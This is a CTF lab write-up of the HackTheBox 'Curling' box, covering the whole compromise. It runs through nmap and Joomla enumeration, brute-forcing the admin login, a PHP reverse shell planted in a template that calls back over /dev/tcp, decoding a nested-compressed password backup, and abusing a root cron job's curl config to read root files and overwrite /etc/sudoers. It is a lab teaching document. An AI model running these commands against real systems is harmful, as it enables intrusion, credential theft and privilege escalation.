
HackTheBox Curling Writeup

Explore the fundamentals of cybersecurity with the Curling Capture The Flag (CTF) challenge, an easy-level experience designed to be accessible and ideal for beginners. This straightforward CTF write-up offers clear insights into essential Linux concepts.

Add Hosts

Edit the /etc/hosts file and add the following entry:

10.10.10.150 curling.htb

This lets your system resolve curling.htb to the box's IP address, 10.10.10.150.

Script to add hosts automatically

ip="10.10.10.150"
domain="curling.htb"
# append the entry only if it is not already present
grep -qF "$ip $domain" /etc/hosts || echo "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV curling.htb

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-13 15:58 CEST
Nmap scan report for curling.htb (10.10.10.150)
Host is up (0.050s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Determine Joomla Version

Joomla's manifest is served without authentication and states the exact version in its <version> element:

http://curling.htb/administrator/manifests/files/joomla.xml

Brute Force

While inspecting the page source of http://curling.htb/ (index.php), you find the following comment:
<!-- secret.txt -->

Navigate to http://curling.htb/secret.txt to find a Base64-encoded string.

Decode it and save it as a one-line password file (wrapping the output in echo guarantees a trailing newline, which the wordlist readers expect):

echo "$(curl -s http://curling.htb/secret.txt | base64 -d)" > password

Brute-Forcing Joomla Login

cewl builds a wordlist from the site's own text, which includes the author's name, so it doubles as a username list (sed '1d' drops cewl's banner line). Nmap's http-joomla-brute script then tries every harvested word as a user against the single decoded password; brute.mode=user does exactly that pairing and brute.firstonly=true stops at the first hit:

cewl curling.htb | sed '1d' > cewl.out
echo "$(curl -s http://curling.htb/secret.txt | base64 -d)" > password
nmap -p 80 --script http-joomla-brute --script-args userdb=cewl.out,passdb=password,brute.mode=user,brute.firstonly=true curling.htb
rm -f cewl.out password

This yields the credentials Floris:Curling2018!

You can now log in at:

1
http://curling.htb/administrator/index.php

Obtaining a Reverse Shell

Go to Extensions > Templates, open the active site template and edit its index.php: PHP added there runs on every page load.

Start a listener and prepare the payload (tun0 is assumed to be your VPN interface):

attackerip=$(ip -4 addr show tun0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
echo "Add in the index.php -> system('bash -c \"bash -i >& /dev/tcp/$attackerip/9001 0>&1\"');"
nc -lvnp 9001

Then load any page of the site to trigger the callback. Remove the line again once you have a shell; until then it fires for every visitor.

Get an Interactive Shell: once the reverse shell connects, upgrade it to a real TTY:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run in your local terminal (stty size prints your rows and columns, which you can apply inside the remote shell afterwards with stty rows R cols C to fix line wrapping):

stty size; stty raw -echo; fg

As the last step, set the terminal type:

export TERM=xterm

Extracting Password Backup

/home/floris/password_backup is readable from the www-data shell and, as cat shows, is an xxd hexdump. Reverse it and peel the layers one at a time, letting file identify each one:

cp /home/floris/password_backup /dev/shm
cd /dev/shm
cat password_backup           # xxd hexdump
xxd -r password_backup > 1    # reverse the hexdump
file 1; bzcat 1 > 2           # bzip2
file 2; zcat 2 > 3            # gzip
file 3; bzcat 3 > 4           # bzip2 again
file 4; tar -xvf 4            # tar archive holding password.txt
cat password.txt

password.txt contains floris's password, 5d<wdCbdZu)|hChXll, which also works for SSH.
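The hand-driven chain above works, but the magic bytes can decide each step for you. The following Python is an added example, not code from the original writeup: it reverses an xxd hexdump the way xxd -r does, then peels bzip2, gzip and tar layers in whatever order they appear, stopping at plain data. The sample input it builds (a placeholder password.txt wrapped tar -> bzip2 -> gzip -> bzip2 -> hexdump) is constructed to mirror the nesting on the box; the placeholder is not the real password.

```python
# Added example, not from the original writeup: auto-unwrap a hexdumped,
# multiply-compressed blob by sniffing magic bytes at each layer.
import bz2
import gzip
import io
import tarfile


def xxd_dump(data: bytes, cols: int = 16) -> str:
    """Format bytes like `xxd` does; used only to construct the sample input,
    since the real password_backup is already a hexdump."""
    lines = []
    for off in range(0, len(data), cols):
        chunk = data[off:off + cols]
        groups = [chunk[i:i + 2].hex() for i in range(0, len(chunk), 2)]
        hex_field = " ".join(groups).ljust(cols * 2 + cols // 2 - 1)
        ascii_field = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {hex_field}  {ascii_field}")
    return "\n".join(lines) + "\n"


def xxd_reverse(dump: str) -> bytes:
    """Equivalent of `xxd -r`: keep only the hex field of each line, which sits
    between the offset's colon and the two spaces before the ASCII column."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue
        hex_field = line.split(":", 1)[1].split("  ", 1)[0]
        out += bytes.fromhex(hex_field.replace(" ", ""))
    return bytes(out)


def detect(blob: bytes) -> str:
    """Identify the outermost container by magic bytes, as `file` would."""
    if blob.startswith(b"BZh"):
        return "bzip2"
    if blob.startswith(b"\x1f\x8b"):
        return "gzip"
    if len(blob) >= 512 and blob[257:262] == b"ustar":  # ustar/pax header magic
        return "tar"
    return "plain"


def unwrap(blob: bytes, max_layers: int = 16):
    """Peel layers until a tar archive or plain data is reached.
    Returns (layers, files): layers lists the containers seen; files maps
    member name to content for a tar, or {None: data} for plain data."""
    layers = []
    for _ in range(max_layers):
        kind = detect(blob)
        if kind == "plain":
            return layers, {None: blob}
        layers.append(kind)
        if kind == "bzip2":
            blob = bz2.decompress(blob)
        elif kind == "gzip":
            blob = gzip.decompress(blob)
        else:  # tar: extract regular members and stop
            with tarfile.open(fileobj=io.BytesIO(blob), mode="r:") as tar:
                files = {m.name: tar.extractfile(m).read()
                         for m in tar.getmembers() if m.isfile()}
            return layers, files
    raise ValueError(f"more than {max_layers} layers; refusing to continue")


def build_sample() -> str:
    """Constructed stand-in for password_backup with the box's nesting:
    tar -> bzip2 -> gzip -> bzip2 -> xxd hexdump. Placeholder password."""
    tar_buf = io.BytesIO()
    with tarfile.open(fileobj=tar_buf, mode="w:") as tar:
        payload = b"example-password\n"  # constructed, not the real value
        info = tarfile.TarInfo("password.txt")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    nested = bz2.compress(gzip.compress(bz2.compress(tar_buf.getvalue())))
    return xxd_dump(nested)


if __name__ == "__main__":
    layers, files = unwrap(xxd_reverse(build_sample()))
    print("layers:", " -> ".join(layers))
    for name, content in files.items():
        print(name, content.decode(errors="replace"), end="")
```

To use it on the real file, read password_backup as text and pass it to xxd_reverse, then unwrap the result; detect can be extended with further magics (xz, zip) in the same way.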

Logging in

Log in over SSH with the recovered password. A root cron job reads /home/floris/admin-area/input as a curl config file (curl -K) and writes what it fetches to report, so a url directive pointing at a local file makes root read it for you:

ssh floris@curling.htb
cat user.txt
cd admin-area
echo 'url = "file:///root/root.txt"' > input
watch -n 1 cat report

Note: the job runs about once a minute, so allow up to a minute for the flag to appear in report. Any file root can read can be pulled the same way.

Info

  • Root's crontab lives at /var/spool/cron/crontabs/root. It is mode 0600, so from floris's shell you cannot read it; you infer the job from report being rewritten about once a minute, and can read the file itself once you are root.
  • Because input is parsed as a curl config file, every curl directive is honoured, not just url. Generic template for reading a file as root:
cd /home/floris/admin-area
echo 'url = "file://<path>"' > input
watch -n 1 cat report

Obtaining a Proper Root Shell

The same cron job can also write as root: curl's config syntax accepts an output directive, so pointing url at a file you control and output at /etc/sudoers replaces the sudoers file with your own.

cd /home/floris/admin-area
echo -e "%sudo ALL=(ALL:ALL) ALL\nfloris ALL=(ALL:ALL) ALL" > /tmp/sudoers
echo -e "url = \"file:///tmp/sudoers\"\noutput = \"/etc/sudoers\"" > input
sleep 60; sudo -l    # after the next cron run, the new rule is listed

Two things to watch: /etc/sudoers already exists, so curl truncates and rewrites it in place and the root ownership and 0440 mode that sudo insists on survive; and what you write replaces the whole file, so a syntax error locks sudo for everyone on the box. Keep the content short and valid.

Switch to root user

sudo su -
This post is licensed under CC BY 4.0 by the author.